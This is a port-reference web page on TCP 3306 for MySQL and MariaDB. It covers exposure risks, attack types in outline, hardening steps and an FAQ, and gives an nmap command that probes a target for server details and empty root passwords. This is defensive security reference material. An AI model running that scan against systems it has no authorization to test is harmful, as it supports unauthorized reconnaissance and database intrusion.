Skip to content
PortsDB

Port reference

Port 3306 (TCP) – MySQL / MariaDB

Default listener for MySQL and MariaDB relational database connections.

tcpRegisteredCommonly attacked

Default state

Modern packages bind to localhost (127.0.0.1) by default, but many deployments set bind-address to 0.0.0.0, exposing 3306 across the network or to the internet.

Common attacks

  • Credential brute force and password spraying against root and app accounts
  • Exploitation of empty or default passwords
  • Privilege abuse and FILE-based data exfiltration after login
  • SQL injection pivoting into the database engine

Hardening

  • Bind to localhost or a private interface; never expose 3306 to the internet
  • Remove anonymous and empty-password accounts (run mysql_secure_installation)
  • Enforce strong passwords, least-privilege grants, and host-scoped users
  • Require TLS for client connections and segment with firewalls
  • Keep MySQL/MariaDB patched and monitor failed logins

nmap snippet

nmap -p3306 --script mysql-info,mysql-empty-password <target>

Replace <target> with the host or range you're authorized to scan.

What runs on port 3306?

Port 3306 is the default TCP listener for MySQL and its drop-in fork MariaDB, two of the most widely deployed relational databases. Application servers and admin clients connect over 3306 to run SQL queries against schemas that frequently back websites, SaaS products, and internal apps.

Why it matters for security

MySQL and MariaDB store the data behind countless applications, so 3306 is a prime target. The danger spikes when bind-address is set to 0.0.0.0, exposing the database to the whole network or internet. Combined with empty, default, or weak credentials, this leads directly to mass data theft and ransom, a pattern repeated across thousands of breached open databases.

How it's attacked

Attackers scan for open 3306, then run credential brute force or test for empty/default passwords. After authenticating, an account with broad privileges (or the FILE privilege) can dump tables and exfiltrate data, and SQL injection in web apps can pivot straight into the engine. Compromised databases are commonly wiped and held for ransom.

Hardening checklist

Bind MySQL to localhost or a private interface and keep 3306 off the public internet, behind a firewall, VPN, or SSH tunnel. Run mysql_secure_installation to drop anonymous and empty-password accounts, enforce strong passwords and least-privilege host-scoped grants, and require TLS. Patch regularly and monitor failed logins. Use the nmap snippet above to detect empty passwords and gather server info on hosts you are authorized to test.

Related ports

Port 1433Port 1521Port 5432Port 27017

Frequently asked questions

Is it safe to expose port 3306 to the internet?
No. Internet-facing MySQL is constantly scanned and brute-forced. Bind to localhost or a private network and connect over a VPN, SSH tunnel, or TLS.
Why does my MySQL listen on 0.0.0.0?
Because bind-address was set to 0.0.0.0, often to allow remote app servers. Restrict it to a private interface and firewall the port to trusted hosts only.